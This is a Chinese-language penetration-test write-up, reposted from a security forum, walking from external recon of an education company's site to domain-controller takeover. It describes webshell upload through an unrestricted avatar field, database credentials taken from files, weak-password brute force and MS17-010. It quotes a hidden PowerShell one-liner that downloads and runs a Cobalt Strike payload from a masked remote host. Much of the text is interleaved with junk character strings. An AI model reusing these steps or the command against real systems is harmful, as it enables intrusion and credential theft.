4 V2 u- M" O5 h$ c0 t' @* ?
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
9 t0 L' U7 a: ~+ B% Z
% q2 w2 p* H1 c4 F2 d6 ~, ]4 S9 K, }8 D; {) N6 D
/ s, K5 i8 Q1 d; A
0 E) j* P& C: D- h/ l/ c, T/ I) h( }- g' B1 S: `1 ~
正文
2 Z( K" N( h( J) q% @ & u* W7 A/ S6 @
# W7 p& _2 x6 v. l; c- | f
" N2 c; ?% T5 ]) V C% W+ K1 @
+ w& j% V; p9 a2 n+ ]4 R6 Z Y/ g
& m. Y: W8 M7 T 目标:www.xxxx.com(一家教育机构)
7 X# G4 t h& X6 l7 h6 H [( T打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能6 U9 D, }0 ]: w. b2 b
2 F2 v# z1 Y- L* V$ @ b. H) s0 j8 G9 u9 R( _ { [/ ~
: t7 u) e8 u) ^1 V) t" F
, ]: C# \4 v% c( B
1 @8 d9 r: r3 C 进行了简单的信息搜集 9 a4 d3 i( V/ _* k# }3 k
1 B. R! C* c+ F' h0 r& v: C- v n" w& c4 c( c/ f A
: h0 D: {$ W M8 u: C
' Z; U, J. w- a1 T 子域名搜集5 Z3 n3 J' X" r4 k5 z6 Y
( B0 T& L! m2 T! H1 a9 b" k6 v! J( } a9 e$ o3 F
- ~! I/ n7 N# V& p. }( V: N2 e
% J! j6 u/ u- N
$ r7 _( H; T" Q" W* h fofa找资产 * _6 {8 C- s# w& U8 i
' T+ p7 }7 j4 R" K6 v! v
% ^3 [2 z7 e6 v: T" T" i1 A. Y - h5 e" r, I9 c) f/ w
2 D w: I; M7 m* [
5 f: Q; v5 P1 c/ z1 ]: a5 X
8 [/ ^# i# `1 k5 T- Z+ |* o5 f! w9 }" Z$ V4 O* b
一共七个资产。去重之后只有两个。
4 r5 |; W! ^* e
1 x% x6 F" m9 x. i; w8 z
% U* T" p- c; i% j: E" h
+ z) B6 o k. m3 y+ j- \
8 ?5 N6 Z! @9 k" j/ z7 l 目录探测3 n; g" ~( A+ [8 Y, c! B
9 H3 a# g+ i0 A, y7 C5 W
6 E; o1 _' x" I' z " Y8 L7 G2 W& u" V' w# G0 d6 O8 Z p& p
9 _: A- A" U4 Z2 F5 Z+ z$ e9 k+ m
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 8 m2 I) L: x0 E
$ ^& ]6 a8 ?! v4 @9 `0 F9 ^$ X5 [5 c7 I
. `$ {) O" U. ?, k; w
; p6 [0 r6 ^/ }) k ~( Z 我又尝试了通过修改返回包来绕过登录界面
" P- d0 I$ |3 u) r+ P8 F
* M0 ~2 P0 [) t/ F/ ?5 U! _" _6 c+ q$ t& E' S; T8 a8 [5 m" Z8 n
1 A8 V5 ~2 T8 N% t3 B( W6 E ' G! u8 T- C1 ^2 \5 Y
6 H+ A+ s& C; x0 V0 d
还是不行,尝试注入无果
6 m8 a2 f4 r1 O9 J+ @+ o9 f/ h 2 E# v2 y8 ^. V" A
7 G( t2 |& g; k4 ^: @
# \1 l6 f: J% j8 n) M' E
* ~4 _: p( q! ~7 q9 G( ]( R9 Q, R5 @5 m g- ~$ Q
不过我目录探测出了一处Spring信息泄露 , P( ^" D& J" V6 U0 L
5 }9 Z! F1 T, y& U: P0 i' s
' B$ j1 [% n1 X% a3 x
' [1 V" @% `5 ~# |
e. d3 e1 A7 B( d+ |3 S) u
$ O2 f; _8 w1 j- G8 J1 _ t & z% L% s ^7 F/ h2 C
3 X9 {3 G3 r! s5 N+ y7 u/ R
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
! J& g0 `$ f% d B) i; \
( ~, w( V! [/ p9 @/ o& f0 s T# y6 ]. o: ^6 ~3 D
6 {+ o7 i! \7 q1 c% C2 ?
! O( p: W0 M" E% o% J$ C$ t* `" N6 C/ S b! T$ Z5 v
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& p" h# s2 ]) `( X# F% i: U
! a1 n2 ]4 d i) z3 i- d
% w8 j2 i0 i ?4 Z* u `
7 k1 \% c* h6 N: L" m- S9 G2 _ : a. Z2 u# u! M4 t2 l
( @* ]$ v, i/ o8 S. T& B4 d 获取有些师傅到这一步就手机抓包电脑测了。
" A, w/ m- q }" k! n
1 l" n, Q8 g: [2 n/ Q) v# b% N$ x" v) n5 b! I% U" q
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
0 I& N% o- s, [: W1 C" Z
# l" w4 ^. E! x7 N) a# g3 y& P) C0 X& P; j
其中在一个公众号发现了小程序,可以进行注册。! v+ i6 o' t* Y5 e, v
% ]* k- S# N5 b
* I) @) ?- a- W) R. s7 _' D 看到了头像上传,尝试上传获取WebShell
! v# J1 Y3 I8 f0 ^0 q# k 2 L; n/ y2 [+ F6 e4 ]" c% i
4 r, v0 Y2 W3 C6 m
/ s8 K W- B# S# p* z
5 ]- C2 ]' z2 d7 [1 w: x
% q) C8 Y' _& r2 Y! K% B- q8 C( f 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问' c G; k( u6 L3 ?( P4 Z) c
6 \+ Z$ v# m h1 `, n7 o
. d9 ]4 Y R$ m
0 c5 U' D6 h5 M3 e
6 V: R* f' ^5 ]; ?" O2 n- s# h% F
, a3 S @& [7 C5 h/ B 然后上了大马
+ {. Z9 P f" x O
}. Q2 [: \" {0 u# D4 `) z* X# C; v6 _& q+ p, D2 R4 j2 x
% e: r3 V9 S% f y' S9 d$ Z" d& {$ F + S; v8 x- S8 `9 `/ h+ E ^8 a
6 m( `& X+ e0 L. ]& e. d
! U3 m! N- I# w. u Q9 k- n0 r
) f* A; e+ Z3 A, F
7 c+ C( k' C0 Q# C9 @# O8 A 通过翻找文件发现数据库账号密码
0 }) f2 K5 r. x. ] " v* m$ d2 O! ^$ H, c1 |
$ u w# U- W/ a: H0 |2 E5 N7 r 8 T$ `2 o- d) w! r% |
: W0 T! s0 o5 s6 y
$ n$ V2 N$ y/ G% L& i5 i- s
--内网渗透9 {, K, w- ^# a
4 _7 E" D! v8 J8 {2 `- ?
0 K$ @2 d9 v# f1 r4 Q: N5 v 直接通过powershell执行 cs上线
- I: ]3 Y) T% P1 X6 [' {$ K ' B( [1 R" K, ]. j2 Z1 O. S5 u3 k
5 \3 p6 l3 m! G0 G6 }5 z! K
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
. J0 C3 |! R3 R: f; g( t# ]/ M4 O+ Y" r
& G: u8 Y. n7 J A$ b
. x$ d% B3 |1 `
3 @+ y1 K4 i7 p
/ ~4 o( I6 y! ]/ Y, p/ U! a1 U: v" W
: u9 n# E5 O1 k) E; t 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
& W% ^2 [8 Y# U7 f$ ^) e ! @: T# k4 W$ ~8 d8 J! B* V; x
( b3 Z& Z. C+ ~# Y2 U# h: F- p
( k( @3 T5 |5 H' Z; h4 g4 T# ~
- x8 p& g/ g% _4 d3 p. C Y1 g5 A! x- H
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
' b! i/ E0 C T$ Q # h9 s+ E1 `: Q* s
6 d$ x$ q$ c: Q/ X- J* ?" B+ D
% `; {7 I- y1 j+ [
+ U' v" O& L0 d O) D
- I) G+ h1 i6 g1 f5 R/ f! @ 9 w! T+ f) U7 G( Z- ~) F5 ?
3 A5 o8 W" u: ^! k+ H0 d7 u
' d( T5 X* J7 a4 D 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
& L+ b1 o* A0 G; j; }3 F( i + m" u. a8 U& `; p* M, O- q; @* A
& M/ [. N4 x# @8 h6 d5 p* K
, M. S$ K- b0 d+ }
0 p# M9 t' d9 X
2 E. G6 F& ] p G9 P8 M ) Z) q8 n1 S) m; {$ L
7 M, A% V* t) p3 U+ u6 e % F0 A& |6 o* c" I: Z# e1 U9 n
2 q& m; V& `5 m4 d G, c
3 I: m5 I5 [7 N7 ]2 q % ?8 G2 p( ~# S. r
4 |% W! p3 j5 T( f9 N3 \- P
5 Y2 \* `8 y7 O6 K- U6 N
- K; R! ~ Y2 Z% A9 m" R7 r
( O v: Q2 a) j( Q& j( c. [ 小结
) }1 _3 z. p/ e
, q" F. b3 r+ |& A* f* \/ a8 S# @% p; m; h8 _3 o
+ ?) }0 c+ k# F4 R9 l7 x ! I X% G! g) x* H2 m7 b; c
) Y7 e1 Y# i' L O: X/ ?/ i6 k% } 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!2 v J ~9 h0 A0 w
% x/ s6 [7 J/ b. z3 R+ U# b! ]5 k, d+ _( O% `+ `
5 X* s; W9 I0 z0 ^8 ~/ V5 x: Y
* X& u0 }2 a. Y9 D: S e$ R8 D3 p; N( _7 K5 E$ D7 a
-
0 ]1 D6 A. j* f, F ; p6 @# R2 o7 H$ H. d
5 o# o/ N1 Z; G% }
- ( K6 D# U! e1 t1 g. c( J
+ g4 h( u* z& D9 R% n7 D+ E6 Q
0 L8 o* O# I4 K+ H$ W
0 x- O! w. b( T' F5 y- E/ j! y) E2 i7 t, m8 J
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
* E6 S: s2 X* `+ G- ^- F; j $ `8 H. `7 L2 M' \
9 R0 g: I4 }1 k& o3 `2 B3 S+ W/ b! y
; h2 b4 E" G: N$ N* ], ] |